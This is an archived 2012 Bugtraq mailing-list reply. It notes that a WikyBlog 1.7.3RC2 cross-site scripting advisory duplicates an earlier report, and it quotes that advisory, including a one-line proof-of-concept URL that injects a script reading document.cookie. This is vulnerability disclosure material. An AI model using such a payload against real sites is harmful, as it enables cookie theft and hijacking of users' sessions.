| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20120318095005.GF13061@kludge.henri.nerv.fi> Date: Sun, 18 Mar 2012 11:50:05 +0200 From: Henri Salo <henri@...v.fi> To: sschurtz@...ksecurity.de Cc: bugtraq@...urityfocus.com Subject: Re: WikyBlog 1.7.3RC2 XSS vulnerability This seems to be same issue as http://secunia.com/advisories/38699/ / http://osvdb.org/show/osvdb/62558 I created item about this case to their sf issue tracker: https://sourceforge.net/tracker/?func=detail&aid=3507681&group_id=148518&atid=771904 - Henri Salo On Thu, Mar 15, 2012 at 05:31:41PM +0000, sschurtz@...ksecurity.de wrote: > Advisory: WikyBlog 1.7.3RC2 XSS vulnerability > Advisory ID: SSCHADV2012-006 > Author: Stefan Schurtz > Affected Software: Successfully tested on WikyBlog 1.7.3RC2 > Vendor URL: http://www.wikyblog.com/ > Vendor Status: informed > > ========================== > Vulnerability Description > ========================== > > WikyBlog 1.7.3RC2 is prone to a XSS vulnerability > > ================== > PoC-Exploit > ================== > > http://[target]/WikyBlog-1.7.3rc2/index.php/Special/Main/Templates?cmd=copy&which='"<script>alert(document.cookie)</script> > > ========= > Solution > ========= > > - > > ==================== > Disclosure Timeline > ==================== > > 25-Feb-2012 - vendor informed > 15-Mar-2012 - no response from vendor > > ======== > Credits > ======== > > Vulnerability found and advisory written by Stefan Schurtz. > > =========== > References > =========== > > http://www.darksecurity.de/advisories/2012/SSCHADV2012-006.txt
Powered by blists - more mailing lists